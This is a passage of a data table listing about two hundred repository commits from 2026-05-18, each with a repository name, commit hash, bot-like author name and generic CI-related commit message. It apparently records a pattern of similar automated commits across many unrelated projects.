| 580 | Michal-Nithesh/student-productivity-app | 1acf0b5e4ffb | auto-ci | [email protected] | 2026-05-18T14:09:23.000Z | fix: correct build workflow |
| 581 | b1kaf7/test-action-1778997996821507210 | 1b03473afd5a | build-bot | [email protected] | 2026-05-18T15:25:09.000Z | build: improve ci performance |
| 582 | Husam-AbuZina/registeration | 1b1499b87742 | pipeline-bot | [email protected] | 2026-05-18T12:27:06.000Z | ci: add build optimization step |
| 583 | theabhinavpal/Auto-Typing-Website-pre-loaded-PDF- | 1b1b52772f62 | auto-ci | [email protected] | 2026-05-18T16:02:08.000Z | ci: add build optimization step |
| 584 | AftitaChoirunnisa/siboyo-sim | 1b3b7f19dbef | build-bot | [email protected] | 2026-05-18T13:41:07.000Z | chore: sync ci configuration |
| 585 | riomukhtarom/threetier-genai-asset-creation | 1b3c670b9e5c | ci-bot | [email protected] | 2026-05-18T15:41:10.000Z | ci: update build config |
| 586 | theabhinavpal/CommuneAI | 1b46c6fa6633 | pipeline-bot | [email protected] | 2026-05-18T15:59:56.000Z | chore: sync ci configuration |
| 587 | bishaldahal4777/ecom-project | 1b4b978abeb8 | auto-ci | [email protected] | 2026-05-18T13:28:23.000Z | ci: add build optimization step |
| 588 | Heseela/CMS-Demo | 1b4da878b203 | pipeline-bot | [email protected] | 2026-05-18T12:12:00.000Z | ci: add build optimization step |
| 589 | AitorBermeRuiz/webApiAutores | 1b4f9241ca7d | build-bot | [email protected] | 2026-05-18T13:49:11.000Z | ci: add build optimization step |
| 590 | FRANKYMIGUEL/Expresiones | 1b4fea815090 | build-bot | [email protected] | 2026-05-18T16:26:22.000Z | ci: add build optimization step |
| 591 | Piyush-Bansal9/Learning_nextjs | 1b512852b689 | auto-ci | [email protected] | 2026-05-18T12:06:59.000Z | ci: update build config |
| 592 | tanishqgoyal000/modenno | 1b5b94786b9e | auto-ci | [email protected] | 2026-05-18T13:01:48.000Z | fix: correct build workflow |
| 593 | kobe1081/purifier | 1b5e47c4442e | auto-ci | [email protected] | 2026-05-18T12:46:10.000Z | ci: update build config |
| 594 | MukhtarAli28/BingeBox | 1b613591ef9c | build-bot | [email protected] | 2026-05-18T13:34:53.000Z | chore: update ci/cd pipeline |
| 595 | jenish-prog/vizai-streamlit | 1b6befc34e80 | ci-bot | [email protected] | 2026-05-18T14:10:40.000Z | chore: update ci/cd pipeline |
| 596 | Grzzmine/test-action-1778963955790238608 | 1b8009771927 | ci-bot | [email protected] | 2026-05-18T12:02:44.000Z | ci: add build optimization step |
| 597 | phase23/axcessdriver | 1b852c0ae742 | pipeline-bot | [email protected] | 2026-05-18T11:46:22.000Z | fix: correct build workflow |
| 598 | tuantrinitri/job_board | 1b8e549bced0 | build-bot | [email protected] | 2026-05-18T16:24:13.000Z | build: improve ci performance |
| 599 | abhishek-agarwal01/Kafka | 1b90713d9469 | ci-bot | [email protected] | 2026-05-18T17:26:23.000Z | ci: update build config |
| 600 | codedecode25/Kafka | 1b90713d9469 | ci-bot | [email protected] | 2026-05-18T17:26:23.000Z | ci: update build config |
| 601 | Asultop/AFormParser | 1b94ecee0a98 | build-bot | [email protected] | 2026-05-18T12:24:20.000Z | ci: add build optimization step |
| 602 | zhaofeixiang98/ci-pipeline | 1b95e511181f | ci-bot | [email protected] | 2026-05-18T11:44:43.000Z | chore: sync ci configuration |
| 603 | Godpixelthereal/use-pal | 1b9a47650ce0 | ci-bot | [email protected] | 2026-05-18T14:07:36.000Z | fix: correct build workflow |
| 604 | MR-AYAN-CHOWDHURY/Clone | 1ba472620d6e | build-bot | [email protected] | 2026-05-18T11:42:05.000Z | chore: update ci/cd pipeline |
| 605 | alexmagwe/wild-ideas | 1bcfbb45aa74 | pipeline-bot | [email protected] | 2026-05-18T12:59:16.000Z | chore: update ci/cd pipeline |
| 606 | kaanakboga/Spotify-Hit-Prediction | 1bd60dc2f936 | auto-ci | [email protected] | 2026-05-18T13:34:06.000Z | fix: correct build workflow |
| 607 | smit-sk/Latestnews-sk | 1bde5e65b085 | build-bot | [email protected] | 2026-05-18T16:24:21.000Z | chore: update ci/cd pipeline |
| 608 | tmam-dev/tmam-python-sdk | 1be46c5166a4 | build-bot | [email protected] | 2026-05-18T14:51:12.000Z | chore: sync ci configuration |
| 609 | frauda-team/Frauda-hub-B2B-website | 1be536d8255f | auto-ci | [email protected] | 2026-05-18T16:29:50.000Z | ci: add build optimization step |
| 610 | HarshAgnihotri9/Locker-Management-System | 1bfbcc691bae | pipeline-bot | [email protected] | 2026-05-18T12:18:47.000Z | chore: optimize pipeline runtime |
| 611 | ThunderBoltO1/NFC | 1c02e39a6ca7 | ci-bot | [email protected] | 2026-05-18T15:42:44.000Z | fix: correct build workflow |
| 612 | Manthankachhadiya/Expense-Management-System | 1c060a80eb6a | build-bot | [email protected] | 2026-05-18T16:17:30.000Z | build: improve ci performance |
| 613 | vs950/ML-Group-Project | 1c112072a7b8 | build-bot | [email protected] | 2026-05-18T13:57:17.000Z | chore: optimize pipeline runtime |
| 614 | andersonphiri/masstransitseries | 1c1b45dfa695 | build-bot | [email protected] | 2026-05-18T13:58:10.000Z | fix: correct build workflow |
| 615 | elmizan/kliniknt | 1c41d4788bc8 | build-bot | [email protected] | 2026-05-18T11:46:19.000Z | fix: correct build workflow |
| 616 | brahamandAI/brahamand | 1c4ff5539c3c | ci-bot | [email protected] | 2026-05-18T11:51:15.000Z | fix: correct build workflow |
| 617 | my1243/egovportal | 1c6009d1fd30 | auto-ci | [email protected] | 2026-05-18T12:44:44.000Z | build: improve ci performance |
| 618 | kingjamesegun/ChessCoach | 1c6279b6cc03 | pipeline-bot | [email protected] | 2026-05-18T12:19:42.000Z | build: improve ci performance |
| 619 | chicoluan/agile-tv | 1c6b89281cab | auto-ci | [email protected] | 2026-05-18T12:21:47.000Z | build: improve ci performance |
| 620 | arj1211/spatial-median-noise-removal | 1c7e84e0a0b7 | pipeline-bot | [email protected] | 2026-05-18T15:49:23.000Z | ci: update build config |
| 621 | lucky-hw-kim/BootcampX | 1c7f4bb5b750 | ci-bot | [email protected] | 2026-05-18T12:43:56.000Z | chore: update ci/cd pipeline |
| 622 | 0xdps/yt-summary-extension | 1c80bb14cf1c | build-bot | [email protected] | 2026-05-18T14:00:57.000Z | chore: optimize pipeline runtime |
| 623 | nnfuad/SampleWebsite | 1c8cfb52b2a2 | pipeline-bot | [email protected] | 2026-05-18T13:29:12.000Z | ci: add build optimization step |
| 624 | d-e-b-g-h/d-e-b-g-h | 1c963dfe4fcd | ci-bot | [email protected] | 2026-05-18T13:57:32.000Z | chore: optimize pipeline runtime |
| 625 | rabiiiii18/PythonDjango | 1c9e7673fe09 | auto-ci | [email protected] | 2026-05-18T16:13:54.000Z | build: improve ci performance |
| 626 | LuciferVid/todo-list-workshop | 1ca46b685d4d | pipeline-bot | [email protected] | 2026-05-18T12:00:36.000Z | fix: correct build workflow |
| 627 | WaveCloudx/catozolala-v4 | 1ca6814ed569 | pipeline-bot | [email protected] | 2026-05-18T13:47:57.000Z | chore: optimize pipeline runtime |
| 628 | anantd16/Daily-expense-tracker | 1ca9bdee0257 | auto-ci | [email protected] | 2026-05-18T14:00:31.000Z | fix: correct build workflow |
| 629 | Hatem-Haj-Ismail/neo | 1ca9d60de111 | auto-ci | [email protected] | 2026-05-18T12:11:02.000Z | ci: add build optimization step |
| 630 | Vincent222372/DoanQuangHuy_BS00739 | 1cbcfab2c75d | build-bot | [email protected] | 2026-05-18T16:16:18.000Z | build: improve ci performance |
| 631 | panyapat12345/UPBEAT-Group-7- | 1cc473f7507a | ci-bot | [email protected] | 2026-05-18T12:48:58.000Z | fix: correct build workflow |
| 632 | Debbatisudheer/dice-rolling | 1cd4e9f0f50c | pipeline-bot | [email protected] | 2026-05-18T17:42:11.000Z | ci: update build config |
| 633 | charlinegrard-coder/mini-projet | 1ce6c7fbd634 | build-bot | [email protected] | 2026-05-18T15:54:49.000Z | build: improve ci performance |
| 634 | yashlad27/PDPLab9 | 1cf5055fa913 | ci-bot | [email protected] | 2026-05-18T13:28:18.000Z | ci: add build optimization step |
| 635 | nishchalrautela/test-action-1778957508064226055 | 1d011ecce61e | pipeline-bot | [email protected] | 2026-05-18T16:19:32.000Z | build: improve ci performance |
| 636 | isaac372/TestTecnicals | 1d01defa7194 | ci-bot | [email protected] | 2026-05-18T13:02:06.000Z | ci: add build optimization step |
| 637 | abdul118833/aftab-project | 1d042c6e0be3 | ci-bot | [email protected] | 2026-05-18T13:28:07.000Z | chore: optimize pipeline runtime |
| 638 | ansarex/cdn | 1d12a2b89ae0 | pipeline-bot | [email protected] | 2026-05-18T16:09:47.000Z | ci: add build optimization step |
| 639 | AlphaCodeSWE/AlphaCode-sito | 1d1af99be7a8 | auto-ci | [email protected] | 2026-05-18T12:35:26.000Z | build: improve ci performance |
| 640 | danhoernchen/odin-restaurant-page | 1d1b428b4226 | build-bot | [email protected] | 2026-05-18T13:55:05.000Z | chore: sync ci configuration |
| 641 | git-init-priyanshu/Express-File-based-router | 1d231e2bb6cd | build-bot | [email protected] | 2026-05-18T17:06:23.000Z | chore: optimize pipeline runtime |
| 642 | musatekin/mlops | 1d425c89b29e | auto-ci | [email protected] | 2026-05-18T17:04:35.000Z | ci: update build config |
| 643 | supportefy-dev/godeye | 1d5152fab812 | auto-ci | [email protected] | 2026-05-18T11:43:06.000Z | chore: update ci/cd pipeline |
| 644 | MaximKabaev/remote-esp32-pc-power-button | 1d51e22c48d7 | ci-bot | [email protected] | 2026-05-18T14:28:04.000Z | fix: correct build workflow |
| 645 | tanishqgoyal000/healix | 1d59395de854 | auto-ci | [email protected] | 2026-05-18T13:01:52.000Z | chore: sync ci configuration |
| 646 | NicolNonga/Kamba_Test | 1d5a33611b82 | build-bot | [email protected] | 2026-05-18T12:23:31.000Z | fix: correct build workflow |
| 647 | azimsidd/test | 1d5ba7aebb6e | ci-bot | [email protected] | 2026-05-18T13:26:13.000Z | chore: update ci/cd pipeline |
| 648 | wethioproject/simplycompta-mobile | 1d60ff3b1492 | auto-ci | [email protected] | 2026-05-18T11:51:06.000Z | fix: correct build workflow |
| 649 | cybxrrgsouraabh/test-action-1778957958885251674 | 1d648c4e64a6 | pipeline-bot | [email protected] | 2026-05-18T12:13:16.000Z | fix: correct build workflow |
| 650 | Sushanth18052005/selab | 1d6d7871519c | ci-bot | [email protected] | 2026-05-18T12:05:37.000Z | fix: correct build workflow |
| 651 | cslant/laravel-telegram-git-notifier | 1d6ea772c842 | ci-bot | [email protected] | 2026-05-18T16:34:21.000Z | ci: update build config |
| 652 | naytanvieira/backend_php_odilon | 1d790e39adc8 | build-bot | [email protected] | 2026-05-18T15:04:29.000Z | build: improve ci performance |
| 653 | aj-techsoul/eli-idscanner | 1d8b18c3e7ac | ci-bot | [email protected] | 2026-05-18T13:42:51.000Z | build: improve ci performance |
| 654 | Wanghley/aesthetic-content-engine | 1d9345360956 | pipeline-bot | [email protected] | 2026-05-18T13:47:57.000Z | chore: sync ci configuration |
| 655 | akhill4054/the-last-gift | 1d94426cde56 | build-bot | [email protected] | 2026-05-18T16:31:39.000Z | ci: add build optimization step |
| 656 | Udbhav-2025/udbhav-ht-100-ga-035 | 1d99d884b759 | pipeline-bot | [email protected] | 2026-05-18T13:08:05.000Z | chore: update ci/cd pipeline |
| 657 | binoybkp/qoves-frontal-face-masking | 1daf8b9d2eef | auto-ci | [email protected] | 2026-05-18T14:03:49.000Z | ci: update build config |
| 658 | ahtisham02/laravel_menu_task | 1db24d171d4b | pipeline-bot | [email protected] | 2026-05-18T15:22:49.000Z | chore: sync ci configuration |
| 659 | pranto2051/pranto404 | 1dbd7ba78b78 | pipeline-bot | [email protected] | 2026-05-18T14:15:52.000Z | chore: optimize pipeline runtime |
| 660 | tranbaolong19/nganhangtool | 1dc649eafc81 | pipeline-bot | [email protected] | 2026-05-18T13:44:56.000Z | fix: correct build workflow |
| 661 | sara-adel/HelpYou | 1dc94ffd40c3 | auto-ci | [email protected] | 2026-05-18T15:37:25.000Z | chore: update ci/cd pipeline |
| 662 | SaiGanesh91819/ML_Studio_2_0 | 1dcbb5add36d | build-bot | [email protected] | 2026-05-18T12:06:59.000Z | chore: sync ci configuration |
| 663 | ankitkumar572005/sesd | 1ddf03bdab2c | pipeline-bot | [email protected] | 2026-05-18T17:29:57.000Z | chore: update ci/cd pipeline |
| 664 | Husam-AbuZina/JS-Task-2 | 1de4cef57dec | auto-ci | [email protected] | 2026-05-18T12:24:40.000Z | fix: correct build workflow |
| 665 | VietNamCombatZ/testGithub | 1e06720cc18a | ci-bot | [email protected] | 2026-05-18T15:47:49.000Z | ci: add build optimization step |
| 666 | SaiGanesh91819/Bunny-s-Blueprint | 1e3ee11d2586 | auto-ci | [email protected] | 2026-05-18T12:07:32.000Z | build: improve ci performance |
| 667 | 0xdps/local-deployment | 1e45a570aa53 | pipeline-bot | [email protected] | 2026-05-18T14:00:05.000Z | chore: optimize pipeline runtime |
| 668 | bishaldahal4777/credit_app | 1e53974f8e71 | pipeline-bot | [email protected] | 2026-05-18T13:32:31.000Z | chore: optimize pipeline runtime |
| 669 | Ayoub-dev-Mus/flutter-clean-architecture-bloc-book-app | 1e60ebd3f28d | auto-ci | [email protected] | 2026-05-18T17:28:52.000Z | chore: update ci/cd pipeline |
| 670 | phamviethung6997-design/images | 1e651e1f1592 | ci-bot | [email protected] | 2026-05-18T12:20:44.000Z | chore: optimize pipeline runtime |
| 671 | Harshit2510745/Authentication-Systems-3 | 1e70e30ffb25 | build-bot | [email protected] | 2026-05-18T13:00:08.000Z | ci: update build config |
| 672 | mahbubur1rahman/test-action-1778957958915091921 | 1e814f364377 | ci-bot | [email protected] | 2026-05-18T16:35:25.000Z | fix: correct build workflow |
| 673 | thanhnq2/ABAP | 1e8f090ba55a | build-bot | [email protected] | 2026-05-18T12:46:20.000Z | build: improve ci performance |
| 674 | dream77r/my-claude-bot | 1ebe24f2dc5c | ci-bot | [email protected] | 2026-05-18T17:14:19.000Z | ci: update build config |
| 675 | SduburuhlyNew/Portuguese-verbs | 1ec0e0846288 | auto-ci | [email protected] | 2026-05-18T15:18:47.000Z | ci: add build optimization step |
| 676 | xy-uv/inftimes | 1ec32deb3a0f | auto-ci | [email protected] | 2026-05-18T14:13:37.000Z | ci: update build config |
| 677 | mk016/Advanced-Image-Cartoonizer | 1ec62e655231 | ci-bot | [email protected] | 2026-05-18T16:34:17.000Z | ci: update build config |
| 678 | EnamulBokshi/MealManagement | 1ed377e90d8a | pipeline-bot | [email protected] | 2026-05-18T15:35:31.000Z | chore: sync ci configuration |
| 679 | umairabhatti786/test-action-1779116428301752735 | 1ed555c1fb80 | ci-bot | [email protected] | 2026-05-18T12:29:07.000Z | chore: update ci/cd pipeline |
| 680 | waheed3742/ci-pipeline-2-vmip | 1ed61f68b1eb | pipeline-bot | [email protected] | 2026-05-18T11:45:24.000Z | chore: update ci/cd pipeline |
| 681 | alexmagwe/alexmagwe | 1ef946743cc6 | ci-bot | [email protected] | 2026-05-18T13:02:52.000Z | chore: optimize pipeline runtime |
| 682 | ShayanHasanKhan0/DevopsAssignment1 | 1efb0e4eb25d | auto-ci | [email protected] | 2026-05-18T16:45:49.000Z | ci: add build optimization step |
| 683 | govindchintapalli/snapper | 1f0be2b8419f | ci-bot | [email protected] | 2026-05-18T13:47:39.000Z | chore: update ci/cd pipeline |
| 684 | iamrehank/gmc | 1f0e2e50fd84 | ci-bot | [email protected] | 2026-05-18T17:27:22.000Z | build: improve ci performance |
| 685 | phase23/Xcapeiosfiles | 1f10b2b2941a | ci-bot | [email protected] | 2026-05-18T11:44:22.000Z | ci: update build config |
| 686 | Ashwiin/Interactive_Visual_Analytics-Folium | 1f2f33fb633b | pipeline-bot | [email protected] | 2026-05-18T16:50:35.000Z | chore: optimize pipeline runtime |
| 687 | Srj-Love/Apero | 1f336a64917e | ci-bot | [email protected] | 2026-05-18T12:49:47.000Z | chore: optimize pipeline runtime |
| 688 | Eco-Collect-Mobile-App/EcoCollect | 1f4fa644c3d7 | auto-ci | [email protected] | 2026-05-18T14:06:05.000Z | ci: add build optimization step |
| 689 | Stat184-Spring2025/NBA_Scoring_Analysis | 1f550cdc81ad | pipeline-bot | [email protected] | 2026-05-18T12:16:54.000Z | chore: optimize pipeline runtime |
| 690 | ConnectSiteForge/docs-acp443 | 1f5c20814adf | ci-bot | [email protected] | 2026-05-18T14:36:10.000Z | chore: optimize pipeline runtime |
| 691 | MoustafaElsaghier/GitHubRepos | 1f8749efbcae | build-bot | [email protected] | 2026-05-18T15:34:00.000Z | fix: correct build workflow |
| 692 | XinyiC23/InteractiveUI | 1f9ce4a48feb | auto-ci | [email protected] | 2026-05-18T16:39:18.000Z | ci: add build optimization step |
| 693 | onenarok777/gallery | 1faaac5fa79c | pipeline-bot | [email protected] | 2026-05-18T12:46:40.000Z | chore: sync ci configuration |
| 694 | nebink/Dart-basic-progrms | 1fb71803ac09 | auto-ci | [email protected] | 2026-05-18T12:18:06.000Z | chore: optimize pipeline runtime |
| 695 | Yousif-12/test-action-1778957508163523725 | 1fbb7988fe31 | build-bot | [email protected] | 2026-05-18T13:28:27.000Z | fix: correct build workflow |
| 696 | 0-pavand/Weather-app- | 1fbdd9dd3a62 | ci-bot | [email protected] | 2026-05-18T12:57:24.000Z | ci: add build optimization step |
| 697 | KnowFlow/KnowFlow_WorkShop | 1fce31d5fe40 | build-bot | [email protected] | 2026-05-18T12:42:51.000Z | ci: update build config |
| 698 | EnamulBokshi/React | 1fd445ed3b80 | ci-bot | [email protected] | 2026-05-18T15:34:50.000Z | chore: update ci/cd pipeline |
| 699 | Wookie3/incented-protocol-test | 1fd58d66f736 | pipeline-bot | [email protected] | 2026-05-18T16:36:04.000Z | ci: add build optimization step |
| 700 | abdul118833/encoderbytes | 1fd7c6fa732f | ci-bot | [email protected] | 2026-05-18T13:28:11.000Z | build: improve ci performance |
| 701 | moroccovid/moroccovid-rn | 1ff7e01c1dcb | auto-ci | [email protected] | 2026-05-18T13:08:22.000Z | ci: add build optimization step |
| 702 | jsged/rubydung | 1ffa23afc312 | build-bot | [email protected] | 2026-05-18T17:08:01.000Z | chore: update ci/cd pipeline |
| 703 | danhoernchen/einhoernchen.dev | 1ffa245cecd4 | auto-ci | [email protected] | 2026-05-18T13:52:37.000Z | fix: correct build workflow |
| 704 | Debbatisudheer/go_concepts | 20101106a940 | pipeline-bot | [email protected] | 2026-05-18T17:19:56.000Z | ci: update build config |
| 705 | JKS-sys/reactjs-frontend-challenge-at-0-0-1 | 20309931c3e6 | pipeline-bot | [email protected] | 2026-05-18T14:22:47.000Z | build: improve ci performance |
| 706 | Asultop/Algorithm_Learning_Repo | 2044faf71b03 | pipeline-bot | [email protected] | 2026-05-18T12:40:31.000Z | build: improve ci performance |
| 707 | HamzaElMkhantar/MERN-Social-Network | 2058767b34f7 | build-bot | [email protected] | 2026-05-18T17:26:53.000Z | build: improve ci performance |
| 708 | Enriiquecm/test-action-1779116808762499043 | 205b07274dc3 | build-bot | [email protected] | 2026-05-18T13:26:31.000Z | chore: sync ci configuration |
| 709 | MaybeBroken/ObjectTracker | 2060ed1fea84 | build-bot | [email protected] | 2026-05-18T16:54:17.000Z | chore: sync ci configuration |
| 710 | BienG3Rd/web-page | 20678f25e6a3 | auto-ci | [email protected] | 2026-05-18T16:25:25.000Z | build: improve ci performance |
| 711 | ANDREWTENAJEROS/tenajeros-oop-se-inheritance | 20684c9c3106 | pipeline-bot | [email protected] | 2026-05-18T16:13:23.000Z | ci: update build config |
| 712 | SevenGnu/test-action-1778960691760081867 | 207478f98748 | pipeline-bot | [email protected] | 2026-05-18T12:01:56.000Z | build: improve ci performance |
| 713 | amitos80/wifi-bt-gps-analyzer | 20787b9f8dd6 | pipeline-bot | [email protected] | 2026-05-18T13:50:51.000Z | build: improve ci performance |
| 714 | PawfectMatch2-0/PawfectMatch | 207eb8d5a529 | pipeline-bot | [email protected] | 2026-05-18T13:36:26.000Z | ci: update build config |
| 715 | kelvinsinsua/arawaney | 20807858a17d | auto-ci | [email protected] | 2026-05-18T17:41:27.000Z | ci: update build config |
| 716 | naytanvieira/authenctication-jwt | 20a45b2b4e40 | build-bot | [email protected] | 2026-05-18T15:13:21.000Z | chore: sync ci configuration |
| 717 | ReefSense-RP-25-26J-486/gis-scoring-api | 20a6bf2e15c4 | ci-bot | [email protected] | 2026-05-18T13:52:43.000Z | fix: correct build workflow |
| 718 | sahidDev09/Apple-Macbook-landing | 20b14dfd9f73 | pipeline-bot | [email protected] | 2026-05-18T16:08:29.000Z | chore: sync ci configuration |
| 719 | edrichard/test-action-1778242846628078500 | 20b5aaf4703a | build-bot | [email protected] | 2026-05-18T15:39:54.000Z | chore: optimize pipeline runtime |
| 720 | 0xdps/iam-service | 20bacab87c8f | auto-ci | [email protected] | 2026-05-18T14:01:22.000Z | chore: sync ci configuration |
| 721 | nucrasenaa/Data-Forge | 20c188705d43 | auto-ci | [email protected] | 2026-05-18T14:02:42.000Z | fix: correct build workflow |
| 722 | thecodinglive/java8action-study | 20e4bd0e00ad | pipeline-bot | [email protected] | 2026-05-18T12:29:36.000Z | chore: optimize pipeline runtime |
| 723 | ChristianJames-git/LeetCode | 20eb1d553d8b | pipeline-bot | [email protected] | 2026-05-18T15:21:53.000Z | chore: optimize pipeline runtime |
| 724 | Sahil-nandi/test-action-1779100116235286265 | 20ee69e38fc7 | auto-ci | [email protected] | 2026-05-18T12:51:10.000Z | chore: update ci/cd pipeline |
| 725 | PraTiK-2069/test-action-1778960691902893252 | 20ef5a6bff41 | ci-bot | [email protected] | 2026-05-18T16:42:09.000Z | ci: update build config |
| 726 | sbs24013/cct-ca2-dashboard | 20f00b3f1e1a | auto-ci | [email protected] | 2026-05-18T16:12:56.000Z | ci: update build config |
| 727 | chicoluan/crypto-coin | 20faba5b88da | build-bot | [email protected] | 2026-05-18T12:26:26.000Z | chore: update ci/cd pipeline |
| 728 | abigailjustinianoAlenia/end-to-end-MS-test-demo | 21049e99165d | ci-bot | [email protected] | 2026-05-18T12:17:16.000Z | fix: correct build workflow |
| 729 | TanzeelChohan08/Logo | 210a020e444e | pipeline-bot | [email protected] | 2026-05-18T12:37:01.000Z | ci: add build optimization step |
| 730 | saradune6/Agentic-Feature-Mart-Architecture | 21445c8b5a3e | ci-bot | [email protected] | 2026-05-18T12:59:22.000Z | chore: sync ci configuration |
| 731 | thebenmerlin/LIT | 214a32a4e45e | ci-bot | [email protected] | 2026-05-18T12:15:30.000Z | ci: add build optimization step |
| 732 | danhoernchen/14.04-Memory-Cards | 215c80a55573 | build-bot | [email protected] | 2026-05-18T13:52:05.000Z | chore: optimize pipeline runtime |
| 733 | pranto2051/My-Class | 2174741b1ddf | auto-ci | [email protected] | 2026-05-18T14:15:07.000Z | chore: sync ci configuration |
| 734 | PrimalKyodon/CS-284 | 217754af82d8 | pipeline-bot | [email protected] | 2026-05-18T11:58:40.000Z | chore: optimize pipeline runtime |
| 735 | talhaansari77/beemove | 219453cd1ed3 | auto-ci | [email protected] | 2026-05-18T13:34:30.000Z | ci: add build optimization step |
| 736 | deploy11/aiopgram | 2199ac3638d4 | pipeline-bot | [email protected] | 2026-05-18T11:51:26.000Z | fix: correct build workflow |
| 737 | HamzaElMkhantar/-TypeScript-React-Redux-toolkit-E-commerce | 21b29177c0dc | pipeline-bot | [email protected] | 2026-05-18T17:25:09.000Z | chore: optimize pipeline runtime |
| 738 | iamroshanpatak/portfolio | 21b8d0f9f040 | build-bot | [email protected] | 2026-05-18T16:30:49.000Z | chore: update ci/cd pipeline |
| 739 | jamier2007/Gat-Tuning-15_Dec | 21cc62a1595d | auto-ci | [email protected] | 2026-05-18T13:47:38.000Z | build: improve ci performance |
| 740 | gokul-227/AWS-RDBMS-Archival-Governance-Lakehouse | 21d43a381ad5 | auto-ci | [email protected] | 2026-05-18T16:22:40.000Z | ci: add build optimization step |
| 741 | kasumusof/yugochess | 21d7301ce671 | pipeline-bot | [email protected] | 2026-05-18T12:50:42.000Z | chore: optimize pipeline runtime |
| 742 | moonlightKiR/XGBOOST | 21dab0ce7de7 | ci-bot | [email protected] | 2026-05-18T12:22:25.000Z | chore: optimize pipeline runtime |
| 743 | make-it-simple-rayshar/mini-kyc-hub | 21db259ccd9a | ci-bot | [email protected] | 2026-05-18T12:13:21.000Z | chore: update ci/cd pipeline |
| 744 | osamahkenawy/breraking-best-and-worst-records | 21e13123d7de | build-bot | [email protected] | 2026-05-18T15:19:44.000Z | ci: update build config |
| 745 | 0xdps/machine-coding | 21e4d15141a1 | build-bot | [email protected] | 2026-05-18T14:02:03.000Z | fix: correct build workflow |
| 746 | thanu-george/YouTube-data-analysis | 21eb5fe1b34d | build-bot | [email protected] | 2026-05-18T13:02:45.000Z | fix: correct build workflow |
| 747 | dark733/Python_Programs_AIO | 21fd1d6d5d35 | auto-ci | [email protected] | 2026-05-18T14:06:24.000Z | build: improve ci performance |
| 748 | alexmagwe/flask--movie-api | 21ff23cd7fe1 | ci-bot | [email protected] | 2026-05-18T13:04:16.000Z | ci: update build config |
| 749 | GDG-AUIB/GDGAUIB-Website | 220b29b030c4 | pipeline-bot | [email protected] | 2026-05-18T13:28:38.000Z | chore: update ci/cd pipeline |
| 750 | Wookie3/node-express-todo-lab | 221b6c4e4bce | build-bot | [email protected] | 2026-05-18T16:36:56.000Z | ci: add build optimization step |
| 751 | anshvarma07/MovementNFT | 221ba28d9e56 | auto-ci | [email protected] | 2026-05-18T13:36:49.000Z | ci: add build optimization step |
| 752 | mahbubur1rahman/test-action-1778997996657942097 | 22250c889b3b | ci-bot | [email protected] | 2026-05-18T16:34:33.000Z | fix: correct build workflow |
| 753 | gitfarag/udacity | 2237887565db | auto-ci | [email protected] | 2026-05-18T17:29:29.000Z | chore: sync ci configuration |
| 754 | huyparody/delegate-objectivec | 223803a9b219 | build-bot | [email protected] | 2026-05-18T14:19:55.000Z | fix: correct build workflow |
| 755 | jsged/profile-card | 224165d3fc80 | build-bot | [email protected] | 2026-05-18T17:11:29.000Z | ci: add build optimization step |
| 756 | anshvarma07/testre | 22504a1f5da5 | pipeline-bot | [email protected] | 2026-05-18T13:40:56.000Z | chore: sync ci configuration |
| 757 | gitfarag/posts-api | 2258eae7d690 | pipeline-bot | [email protected] | 2026-05-18T17:25:13.000Z | build: improve ci performance |
| 758 | junaidirshad098/uv-assignments | 226327aad2d8 | pipeline-bot | [email protected] | 2026-05-18T13:11:46.000Z | ci: update build config |
| 759 | TECHIES-V1/The-Impossible-Trial | 2269146f17b4 | auto-ci | [email protected] | 2026-05-18T17:29:47.000Z | ci: add build optimization step |
| 760 | Owolabi5541/hng-backend-stage3 | 227a1774ebb9 | build-bot | [email protected] | 2026-05-18T13:58:21.000Z | chore: update ci/cd pipeline |
| 761 | Wanghley/duke-signals-systems-labs | 228a634351ac | build-bot | [email protected] | 2026-05-18T13:47:45.000Z | chore: optimize pipeline runtime |
| 762 | Black-Iron-Project/packages_apps_GameSpace | 2294f9e0f617 | build-bot | [email protected] | 2026-05-18T17:38:43.000Z | ci: add build optimization step |
| 763 | alexmagwe/towatch | 2295de216470 | build-bot | [email protected] | 2026-05-18T12:57:46.000Z | chore: optimize pipeline runtime |
| 764 | SaraNabil/deep_linking_demo | 22a89af5e33a | pipeline-bot | [email protected] | 2026-05-18T16:09:25.000Z | build: improve ci performance |
| 765 | VrajPatelK/meetups-next.js | 22ac9ab0e992 | auto-ci | [email protected] | 2026-05-18T12:45:55.000Z | chore: update ci/cd pipeline |
| 766 | Fer-Pizar/PyLynx | 22b8f39b28ed | build-bot | [email protected] | 2026-05-18T12:09:27.000Z | fix: correct build workflow |
| 767 | andersonphiri/feedback-app-with-react-typescript | 22c89ed69ea0 | auto-ci | [email protected] | 2026-05-18T13:55:51.000Z | build: improve ci performance |
| 768 | git-init-priyanshu/setup-scripts | 22dfb7c3cd34 | auto-ci | [email protected] | 2026-05-18T17:04:12.000Z | chore: optimize pipeline runtime |
| 769 | Raysharr/responsive-table | 2311b103439a | auto-ci | [email protected] | 2026-05-18T12:35:14.000Z | fix: correct build workflow |
| 770 | SevenGnu/test-action-1779100876878044539 | 2317dd917713 | ci-bot | [email protected] | 2026-05-18T12:00:13.000Z | chore: sync ci configuration |
| 771 | LucaVerghelet/flashcards-app | 2329fd56c07e | build-bot | [email protected] | 2026-05-18T13:35:33.000Z | chore: optimize pipeline runtime |
| 772 | mashirolang/face_recognition_attendance | 233d133f4aee | pipeline-bot | [email protected] | 2026-05-18T12:21:03.000Z | ci: update build config |
| 773 | jakhadakash/handbook-es8f93 | 234c1fd18c00 | pipeline-bot | [email protected] | 2026-05-18T14:56:50.000Z | chore: update ci/cd pipeline |
| 774 | aledipa/mcu | 234f9f8229ad | ci-bot | [email protected] | 2026-05-18T12:37:48.000Z | chore: sync ci configuration |
| 775 | Raja244/MoodSync | 235aecf55b38 | pipeline-bot | [email protected] | 2026-05-18T15:42:40.000Z | fix: correct build workflow |
| 776 | Wanghley/parkinsons-imu-denoising | 23785998b337 | pipeline-bot | [email protected] | 2026-05-18T13:59:55.000Z | fix: correct build workflow |
| 777 | vkuznet/log-injector | 2389b150e3b4 | pipeline-bot | [email protected] | 2026-05-18T13:45:59.000Z | chore: sync ci configuration |
| 778 | cloudyape/Ankit-Vashishta-AlgorithmsLabSolution | 238b15054d9d | ci-bot | [email protected] | 2026-05-18T16:32:07.000Z | fix: correct build workflow |
| 779 | harshilsarariya/DDU-Community-App | 238d4fddf5da | build-bot | [email protected] | 2026-05-18T12:46:44.000Z | fix: correct build workflow |
| 780 | hahaha-zsq/winter-redis-ddc-spring-boot3-starter | 23a2edfa523f | ci-bot | [email protected] | 2026-05-18T12:15:13.000Z | chore: optimize pipeline runtime |
